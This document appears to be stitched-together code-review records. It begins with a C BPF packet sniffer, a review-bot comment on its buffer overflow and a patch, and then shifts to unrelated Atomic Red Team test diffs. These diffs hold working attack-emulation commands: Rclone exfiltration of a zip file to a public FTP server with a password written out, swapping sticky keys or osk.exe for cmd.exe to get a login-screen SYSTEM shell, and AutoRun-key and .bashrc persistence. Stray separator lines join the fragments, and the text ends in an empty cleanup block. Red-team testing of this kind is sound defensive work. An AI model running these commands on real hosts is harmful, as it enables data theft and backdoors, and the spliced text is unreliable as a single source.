void ProcessIncomingPacketLoop(BpfSniffer *psniffer, int timeout)
|
||||
{
|
||||
CapturedInfo info = { NULL };
|
||||
int dataLength = 0;
|
||||
time_t tstop = time(NULL) + timeout;
|
||||
|
||||
// loop to process incoming packets
|
||||
|
||||
while((dataLength = read_bpf_packet_data(psniffer, &info)) != -1)
|
||||
{
|
||||
char* pend = (info.data + dataLength);
|
||||
struct ether_header* eh = (struct ether_header*)info.data;
|
||||
|
||||
if (ntohs(eh->ether_type) == ETHERTYPE_IP) {
|
||||
|
||||
struct ip* ip = (struct ip*)((long)eh + sizeof(struct ether_header));
|
||||
switch(ip->ip_p) {
|
||||
case IPPROTO_TCP:
|
||||
++gNumTcp;
|
||||
break;
|
||||
case IPPROTO_UDP:
|
||||
++gNumUdp;
|
||||
break;
|
||||
case IPPROTO_ICMP:
|
||||
++gNumIcmp;
|
||||
break;
|
||||
default:
|
||||
++gNumOther;
|
||||
break;
|
||||
}
|
||||
|
||||
} else {
|
||||
gNumOther++;
|
||||
}
|
||||
|
||||
if (timeout > 0 && time(NULL) >= tstop) {
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
void PrintStats()
|
||||
{
|
||||
printf("TCP:%lld UDP:%lld ICMP:%lld Other:%lld\n", gNumTcp, gNumUdp, gNumIcmp, gNumOther);
|
||||
}
|
||||
|
||||
void sigint_handler(int sig)
|
||||
{
|
||||
PrintStats();
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[])
|
||||
{
|
||||
BpfSniffer sniffer;
|
||||
int isBpfFilterEnabled = 0;
|
||||
int isPromiscEnabled = 0;
|
||||
int timeout = 0;
|
||||
char ifname[16] = DEFAULT_IFNAME;
|
||||
int c;
|
||||
|
||||
memset(&sniffer, 0, sizeof(sniffer));
|
||||
|
||||
while(1)
|
||||
{
|
||||
int option_index = 0;
|
||||
|
||||
c = getopt_long(argc, argv, "fpi:t:", longopts, &option_index);
|
||||
if (c == -1)
|
||||
break;
|
||||
|
||||
switch (c) {
|
||||
case 'f':
|
||||
isBpfFilterEnabled = 1;
|
||||
break;
|
||||
case 'p':
|
||||
isPromiscEnabled = 1;
|
||||
break;
|
||||
case 'i':
|
||||
strcpy(ifname, optarg);
|
||||
printf("using interface '%s'\n", optarg);
|
||||
break;
|
||||
case 't':
|
||||
timeout = atoi(optarg);
|
||||
printf("will exit after about %d seconds (if packet activity)\n", timeout);
|
||||
break;
|
||||
default:
|
||||
printf("invalid argument: '%c'\n", c);
|
||||
usage(argv[0]);
|
||||
return -1;
|
||||
}
|
||||
}
|
||||
|
||||
if (new_bpf_sniffer(ifname, &sniffer, isBpfFilterEnabled, isPromiscEnabled) == -1)
|
||||
return 1;
|
||||
|
||||
signal(SIGINT, sigint_handler);
|
||||
|
||||
ProcessIncomingPacketLoop(&sniffer, timeout);
|
||||
|
||||
PrintStats();
|
||||
|
||||
close_bpf_sniffer(&sniffer);
|
||||
return 0;
|
||||
}
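Review bot: The BIOCSETIF result in new_bpf_sniffer is tested with `> 0`, but ioctl signals failure with -1, so a bad `-i` name is never detected and the program carries on to read from a bpf device that is bound to nothing; the check should be `== -1` like every other ioctl in the function. In main, `strcpy(ifname, optarg)` copies an unbounded argv string into `char ifname[16]`, and `strcpy(interface.ifr_name, ifname)` then depends on that buffer being terminated, so a long `-i` value overflows the stack buffer; reject names of `sizeof(ifname)` or more and copy with a bounded call (strlcpy is available on macOS, the only target of this file). ProcessIncomingPacketLoop casts `info.data` to `struct ether_header` and then `struct ip` without checking the returned length, and read_bpf_packet_data returns `bh_datalen` (on-wire size) rather than `bh_caplen` (bytes actually in the buffer); returning caplen and counting frames shorter than `sizeof(struct ether_header) + sizeof(struct ip)` as "other" would keep the header reads inside the capture if a record is ever truncated. Smaller items: the `malloc` at the end of new_bpf_sniffer is unchecked, the `sizeof(sniffer->buffer)` in read_bpf_packet_data is the size of a pointer rather than of a `struct bpf_hdr`, and `signal()`/`time()` are used without `<signal.h>`/`<time.h>`, which appears to rely on transitive includes.
```c
// … unchanged: includes, option table, usage(), structs, pick_bpf_device() …

int new_bpf_sniffer(const char *ifname, BpfSniffer *sniffer, int isBpfFilterEnabled, int isPromiscEnabled)
{
    // … unchanged: pick device, BIOCSBLEN …

    // specify interface; ioctl reports failure as -1, never as a positive value
    struct ifreq interface;
    memset(&interface, 0, sizeof(interface));
    strlcpy(interface.ifr_name, ifname, sizeof(interface.ifr_name));
    if (ioctl(sniffer->fd, BIOCSETIF, &interface) == -1) {
        perror("ioctl BIOCSETIF");
        return -1;
    }

    // … unchanged: BIOCIMMEDIATE, BIOCPROMISC, BIOCSETF …

    sniffer->buffer = (char *)malloc(sizeof(char) * sniffer->bufferLength);
    if (sniffer->buffer == NULL) {
        perror("malloc");
        return -1;
    }
    return 0;
}

// … unchanged: read_bpf_packet_data(), close_bpf_sniffer(), ProcessIncomingPacketLoop(), PrintStats(), sigint_handler(), start of main() …

        case 'i':
            // ifname is a fixed 16-byte buffer (IFNAMSIZ); refuse anything that would not fit
            if (strlen(optarg) >= sizeof(ifname)) {
                fprintf(stderr, "interface name too long: '%s'\n", optarg);
                return 1;
            }
            strlcpy(ifname, optarg, sizeof(ifname));
            printf("using interface '%s'\n", optarg);
            break;
```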
|
||||
@@ -18,6 +18,8 @@ Adversaries may opt to obfuscate this data, without the use of encryption, withi
|
||||
|
||||
- [Atomic Test #6 - MAZE FTP Upload](#atomic-test-6---maze-ftp-upload)
|
||||
|
||||
- [Atomic Test #7 - Exfiltration Over Alternative Protocol - FTP - Rclone](#atomic-test-7---exfiltration-over-alternative-protocol---ftp---rclone)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -256,4 +258,66 @@ try {foreach ($file in (dir "$env:windir\temp" "*.7z"))
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #7 - Exfiltration Over Alternative Protocol - FTP - Rclone
|
||||
Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server.
|
||||
[Reference](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/)
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** b854eb97-bf9b-45ab-a1b5-b94e4880c56b
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| ftp_server | Your own ftp server | string | ftp.dlptest.com|
|
||||
| ftp_pass | Your FTP user's password | string | rNrKYTX9g7z3RgJRmxWuGHbeu|
|
||||
| ftp_user | Your FTP username | string | dlpuser|
|
||||
| ftp_port | Your FTP's port | string | 21|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```powershell
|
||||
$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
|
||||
$exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
|
||||
&$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
|
||||
&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `powershell`!
|
||||
##### Description: Check if the exfil package exists
|
||||
##### Check Prereq Commands:
|
||||
```powershell
|
||||
if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit 0} else {exit 1}
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```powershell
|
||||
fsutil file createnew C:\Users\Public\Downloads\exfil.zip 20485760
|
||||
```
|
||||
##### Description: Check if rclone zip exists
|
||||
##### Check Prereq Commands:
|
||||
```powershell
|
||||
if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```powershell
|
||||
Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip"
|
||||
Expand-Archive C:\Users\Public\Downloads\rclone-current-windows-amd64.zip -DestinationPath C:\Users\Public\Downloads\
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -159,3 +159,49 @@ atomic_tests:
|
||||
$ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
|
||||
$ftp_del.GetResponse()}} catch{}
|
||||
name: powershell
|
||||
- name: Exfiltration Over Alternative Protocol - FTP - Rclone
|
||||
auto_generated_guid: b854eb97-bf9b-45ab-a1b5-b94e4880c56b
|
||||
description: |-
|
||||
Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server.
|
||||
[Reference](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/)
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
ftp_server:
|
||||
description: Your own ftp server
|
||||
type: string
|
||||
default: ftp.dlptest.com
|
||||
ftp_pass:
|
||||
description: Your FTP user's password
|
||||
type: string
|
||||
default: rNrKYTX9g7z3RgJRmxWuGHbeu
|
||||
ftp_user:
|
||||
description: Your FTP username
|
||||
type: string
|
||||
default: dlpuser
|
||||
ftp_port:
|
||||
description: Your FTP's port
|
||||
type: string
|
||||
default: 21
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
Check if the exfil package exists
|
||||
prereq_command: |
|
||||
if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
fsutil file createnew C:\Users\Public\Downloads\exfil.zip 20485760
|
||||
- description: 'Check if rclone zip exists'
|
||||
prereq_command: |
|
||||
if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip"
|
||||
Expand-Archive C:\Users\Public\Downloads\rclone-current-windows-amd64.zip -DestinationPath C:\Users\Public\Downloads\
|
||||
executor:
|
||||
command: |-
|
||||
$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
|
||||
$exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
|
||||
&$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
|
||||
&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
|
||||
name: powershell
|
||||
elevation_required: true
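Review bot: The new test has no `cleanup_command`, so after it runs the host keeps an `ftpserver` remote holding the FTP credentials in the user's rclone.conf, plus a 20 MB `exfil.zip` and the rclone binary under C:\Users\Public\Downloads. I would add `cleanup_command: |-` with `$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName`, `&$rclone_bin config delete ftpserver`, and `Remove-Item C:\Users\Public\Downloads\exfil.zip -Force -ErrorAction Ignore`. `ftp_server` is described as "Your own ftp server" yet defaults to a public third-party host, so by default the test pushes 20 MB to a server the operator does not control; the description should state that and advise overriding it. In the `config create` line the placeholders are unquoted, so a host or password containing spaces or `$`/`;` breaks the command (`"pass" "#{ftp_pass}"` etc.), and rclone's documentation warns that a password of 22 or more base64-range characters — which the default is — can be mistaken for an already-obscured value unless `--obscure` is passed, in which case the login silently fails.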
|
||||
|
||||
@@ -412,7 +412,7 @@ art-marker.txt is in the folder.
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
#### Attack Commands: Run with `powershell`!
|
||||
|
||||
|
||||
```powershell
|
||||
|
||||
@@ -178,7 +178,6 @@ atomic_tests:
|
||||
Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
|
||||
Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: PowerShell Downgrade Attack
|
||||
auto_generated_guid: 9148e7c4-9356-420e-a416-e896e9c0f73e
|
||||
description: |
|
||||
|
||||
@@ -113,7 +113,7 @@ will be displayed. Additionally, open Registry Editor to view the new entry in H
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
|
||||
#### Attack Commands: Run with `command_prompt`!
|
||||
|
||||
|
||||
```cmd
|
||||
@@ -135,7 +135,7 @@ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
|
||||
## Atomic Test #2 - Modify Registry of Local Machine - cmd
|
||||
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
|
||||
CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
|
||||
will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
|
||||
will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
@@ -1165,7 +1165,7 @@ See how hermeticwiper uses this technique - https://www.splunk.com/en_us/blog/se
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
|
||||
#### Attack Commands: Run with `command_prompt`!
|
||||
|
||||
|
||||
```cmd
|
||||
@@ -1441,7 +1441,7 @@ See how NetWire malware - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
|
||||
#### Attack Commands: Run with `command_prompt`!
|
||||
|
||||
|
||||
```cmd
|
||||
@@ -1478,7 +1478,7 @@ More information - https://blog.trendmicro.com/trendlabs-security-intelligence/p
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
|
||||
#### Attack Commands: Run with `command_prompt`!
|
||||
|
||||
|
||||
```cmd
|
||||
|
||||
@@ -14,13 +14,12 @@ atomic_tests:
|
||||
cleanup_command: |
|
||||
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Modify Registry of Local Machine - cmd
|
||||
auto_generated_guid: 282f929a-6bc5-42b8-bd93-960c3ba35afe
|
||||
description: |
|
||||
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
|
||||
CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
|
||||
will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
|
||||
will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
@@ -495,7 +494,6 @@ atomic_tests:
|
||||
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1
|
||||
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /f >nul 2>&1
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Windows Powershell Logging Disabled
|
||||
auto_generated_guid: 95b25212-91a7-42ff-9613-124aca6845a8
|
||||
description: |
|
||||
@@ -621,7 +619,6 @@ atomic_tests:
|
||||
reg delete HKCU\SOFTWARE\NetWire /va /f >nul 2>&1
|
||||
reg delete HKCU\SOFTWARE\NetWire /f >nul 2>&1
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Ursnif Malware Registry Key Creation
|
||||
auto_generated_guid: c375558d-7c25-45e9-bd64-7b23a97c1db0
|
||||
description: |
|
||||
@@ -636,7 +633,6 @@ atomic_tests:
|
||||
reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /va /f >nul 2>&1
|
||||
reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /f >nul 2>&1
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Terminal Server Client Connection History Cleared
|
||||
auto_generated_guid: 3448824b-3c35-4a9e-a8f5-f887f68bea21
|
||||
description: |
|
||||
|
||||
@@ -30,7 +30,7 @@ Adds a command to the .bash_profile file of the current user
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| command_to_add | Command to add to the .bash_profile file | String | echo "Hello from Atomic Red Team T1546.004"|
|
||||
| command_to_add | Command to add to the .bash_profile file | String | echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `sh`!
|
||||
@@ -42,7 +42,8 @@ echo '#{command_to_add}' >> ~/.bash_profile
|
||||
|
||||
#### Cleanup Commands:
|
||||
```sh
|
||||
sed -i '/#{command_to_add}/d' ~/.bash_profile
|
||||
head -n '-2' ~/.bash_profile > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.bash_profile
|
||||
```
|
||||
|
||||
|
||||
@@ -67,7 +68,7 @@ Adds a command to the .bashrc file of the current user
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| command_to_add | Command to add to the .bashrc file | String | echo "Hello from Atomic Red Team T1546.004"|
|
||||
| command_to_add | Command to add to the .bashrc file | String | echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `sh`!
|
||||
@@ -79,7 +80,8 @@ echo '#{command_to_add}' >> ~/.bashrc
|
||||
|
||||
#### Cleanup Commands:
|
||||
```sh
|
||||
sed -i '/#{command_to_add}/d' ~/.bashrc
|
||||
head -n '-2' ~/.bashrc > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.bashrc
|
||||
```
|
||||
|
||||
|
||||
|
||||
@@ -12,12 +12,13 @@ atomic_tests:
|
||||
command_to_add:
|
||||
description: Command to add to the .bash_profile file
|
||||
type: String
|
||||
default: echo "Hello from Atomic Red Team T1546.004"
|
||||
default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
|
||||
executor:
|
||||
command: |
|
||||
echo '#{command_to_add}' >> ~/.bash_profile
|
||||
cleanup_command: |
|
||||
sed -i '/#{command_to_add}/d' ~/.bash_profile
|
||||
head -n '-2' ~/.bash_profile > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.bash_profile
|
||||
name: sh
|
||||
- name: Add command to .bashrc
|
||||
auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f
|
||||
@@ -30,10 +31,11 @@ atomic_tests:
|
||||
command_to_add:
|
||||
description: Command to add to the .bashrc file
|
||||
type: String
|
||||
default: echo "Hello from Atomic Red Team T1546.004"
|
||||
default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
|
||||
executor:
|
||||
command: |
|
||||
echo '#{command_to_add}' >> ~/.bashrc
|
||||
cleanup_command: |
|
||||
sed -i '/#{command_to_add}/d' ~/.bashrc
|
||||
head -n '-2' ~/.bashrc > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.bashrc
|
||||
name: sh
|
||||
|
||||
@@ -22,6 +22,8 @@ Other accessibility features exist that may also be leveraged in a similar fashi
|
||||
|
||||
- [Atomic Test #2 - Replace binary of sticky keys](#atomic-test-2---replace-binary-of-sticky-keys)
|
||||
|
||||
- [Atomic Test #3 - Create Symbolic Link From osk.exe to cmd.exe](#atomic-test-3---create-symbolic-link-from-oskexe-to-cmdexe)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -101,7 +103,7 @@ Replace sticky keys binary (sethc.exe) with cmd.exe
|
||||
|
||||
|
||||
```cmd
|
||||
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
|
||||
IF NOT EXIST C:\Windows\System32\sethc_backup.exe (copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe) ELSE ( pushd )
|
||||
takeown /F C:\Windows\System32\sethc.exe /A
|
||||
icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
|
||||
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
|
||||
@@ -116,4 +118,48 @@ copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Create Symbolic Link From osk.exe to cmd.exe
|
||||
Replace accessiblity executable with cmd.exe to provide elevated command prompt from login screen without logging in.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** 51ef369c-5e87-4f33-88cd-6d61be63edf2
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```cmd
|
||||
IF NOT EXIST %windir%\System32\osk.exe.bak (copy %windir%\System32\osk.exe %windir%\System32\osk.exe.bak) ELSE ( pushd )
|
||||
takeown /F %windir%\System32\osk.exe /A
|
||||
icacls %windir%\System32\osk.exe /grant Administrators:F /t
|
||||
del %windir%\System32\osk.exe
|
||||
mklink %windir%\System32\osk.exe %windir%\System32\cmd.exe
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```cmd
|
||||
takeown /F %windir%\System32\osk.exe /A
|
||||
icacls %windir%\System32\osk.exe /grant Administrators:F /t
|
||||
del %windir%\System32\osk.exe
|
||||
copy /Y %windir%\System32\osk.exe.bak %windir%\System32\osk.exe
|
||||
icacls %windir%\system32\osk.exe /inheritance:d
|
||||
icacls %windir%\system32\osk.exe /setowner "NT SERVICE\TrustedInstaller"
|
||||
icacls %windir%\System32\osk.exe /grant "NT SERVICE\TrustedInstaller":F /t
|
||||
icacls %windir%\system32\osk.exe /grant:r SYSTEM:RX
|
||||
icacls %windir%\system32\osk.exe /grant:r Administrators:RX
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -54,11 +54,36 @@ atomic_tests:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
|
||||
IF NOT EXIST C:\Windows\System32\sethc_backup.exe (copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe) ELSE ( pushd )
|
||||
takeown /F C:\Windows\System32\sethc.exe /A
|
||||
icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
|
||||
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
|
||||
cleanup_command: |
|
||||
copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
elevation_required: true
|
||||
- name: Create Symbolic Link From osk.exe to cmd.exe
|
||||
auto_generated_guid: 51ef369c-5e87-4f33-88cd-6d61be63edf2
|
||||
description: |
|
||||
Replace accessiblity executable with cmd.exe to provide elevated command prompt from login screen without logging in.
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
IF NOT EXIST %windir%\System32\osk.exe.bak (copy %windir%\System32\osk.exe %windir%\System32\osk.exe.bak) ELSE ( pushd )
|
||||
takeown /F %windir%\System32\osk.exe /A
|
||||
icacls %windir%\System32\osk.exe /grant Administrators:F /t
|
||||
del %windir%\System32\osk.exe
|
||||
mklink %windir%\System32\osk.exe %windir%\System32\cmd.exe
|
||||
cleanup_command: |
|
||||
takeown /F %windir%\System32\osk.exe /A
|
||||
icacls %windir%\System32\osk.exe /grant Administrators:F /t
|
||||
del %windir%\System32\osk.exe
|
||||
copy /Y %windir%\System32\osk.exe.bak %windir%\System32\osk.exe
|
||||
icacls %windir%\system32\osk.exe /inheritance:d
|
||||
icacls %windir%\system32\osk.exe /setowner "NT SERVICE\TrustedInstaller"
|
||||
icacls %windir%\System32\osk.exe /grant "NT SERVICE\TrustedInstaller":F /t
|
||||
icacls %windir%\system32\osk.exe /grant:r SYSTEM:RX
|
||||
icacls %windir%\system32\osk.exe /grant:r Administrators:RX
|
||||
name: command_prompt
|
||||
elevation_required: true
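Review bot: The cleanup rebuilds osk.exe's ACL from a hand-written list (`/inheritance:d`, `/setowner`, three `/grant` lines) rather than the ACL the file actually had, so any ACE not in that list is lost, and `osk.exe.bak` stays in System32 forever. Saving the DACL before `takeown` with `icacls %windir%\System32\osk.exe /save %TEMP%\T1546.008_osk.acl` and replacing the three `/grant` lines with `icacls %windir%\System32 /restore %TEMP%\T1546.008_osk.acl` (keep the `/setowner` line — as I read the icacls docs, `/save` stores DACLs only) restores what was there, and `del %windir%\System32\osk.exe.bak %TEMP%\T1546.008_osk.acl` can follow the copy-back. `ELSE ( pushd )` is a puzzling no-op for the backup-exists branch; `ELSE ( echo osk.exe.bak already exists )` says what is meant, and the description has a typo (`accessiblity`). Because the attack leaves a SYSTEM shell reachable from the lock screen until cleanup runs, the description should warn against running it on a shared or exposed host without immediate cleanup, and note that SFC/WRP may also revert the change.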
|
||||
|
||||
+85
-1
@@ -10,6 +10,10 @@ Since the execution can be proxied by an account with higher permissions, such a
|
||||
|
||||
- [Atomic Test #1 - Persistence with Custom AutodialDLL](#atomic-test-1---persistence-with-custom-autodialdll)
|
||||
|
||||
- [Atomic Test #2 - HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)](#atomic-test-2---hklm---persistence-using-commandprocessor-autorun-key-with-elevation)
|
||||
|
||||
- [Atomic Test #3 - HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)](#atomic-test-3---hkcu---persistence-using-commandprocessor-autorun-key-with-elevation)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -47,7 +51,7 @@ Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Na
|
||||
##### Description: AltWinSock2DLL DLL must exist on disk at specified at PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
|
||||
##### Check Prereq Commands:
|
||||
```powershell
|
||||
if (Test-Path "#{helper_file}") { exit 0} else { exit 1}
|
||||
if (Test-Path PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll) { exit 0} else { exit 1}
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```powershell
|
||||
@@ -58,4 +62,84 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
|
||||
An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
|
||||
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** a574dafe-a903-4cce-9701-14040f4f3532
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| command | Command to Execute | string | notepad.exe|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```powershell
|
||||
New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -Value "#{command}" -PropertyType "String"
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```powershell
|
||||
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)
|
||||
An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
|
||||
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| command | Command to Execute | string | notepad.exe|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`!
|
||||
|
||||
|
||||
```powershell
|
||||
$path = "HKCU:\Software\Microsoft\Command Processor"
|
||||
if (!(Test-Path -path $path)){
|
||||
New-Item -ItemType Key -Path $path
|
||||
}
|
||||
New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```powershell
|
||||
